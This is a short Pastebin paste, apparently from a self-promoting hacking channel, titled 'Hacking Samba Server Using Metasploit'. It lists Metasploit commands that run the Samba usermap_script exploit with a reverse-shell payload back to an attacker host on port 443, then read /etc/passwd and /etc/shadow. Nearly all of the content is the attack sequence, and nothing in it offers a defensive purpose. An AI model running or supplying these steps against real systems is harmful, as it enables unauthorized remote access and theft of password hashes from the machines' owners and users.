Professional-hacker

Hacking Samba Server Using Metasploit

Dec 17th, 2016
356
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.04 KB | None | 0 0
  1. ##################################################JokerSecurity#########################################################
  2. # Title : Hacking Samba Server Using Metasploit
  3. # Tested On : [ Kali-Linux ]
  4. # MyChannel Youtube : https://www.youtube.com/channel/UCPRRAzu8dMWxChn-RruC-eg/videos
  5. # Myblog : http://kader-information.blogspot.com/
  6. # Link Video :https://www.youtube.com/watch?v=FdzH9V4Klv0&feature=youtu.be
  7. ######################
  8. # [+] COMMENDS :
  9. ######################
  10. nmap ......
  11. msfconsole
  12. search samba
  13. use exploit/multi/samba/usermap_script
  14. show options
  15. set RHOST ...
  16. show payloads
  17. set PAYLOAD cmd/unix/reverse
  18. show options
  19. set LPORT 443
  20. set LHOST ...
  21. exploit
  22. ifconfig
  23. uname -a
  24. whoami
  25. cat /etc/passwd
  26. cat/etc/shadow
  27.  
  28. subscribe for my channel and page in facebook
  29.  
  30. # My Blogger : http://kader-information.blogspot.com/
  31.  
  32. # Page FacebOOk : https://www.facebook.com/AnonymousPalestine.vip
  33.  
  34. By <3
  35.  
  36. ##################################################JokerSecurity#########################################################
Add Comment
Please, Sign In to add comment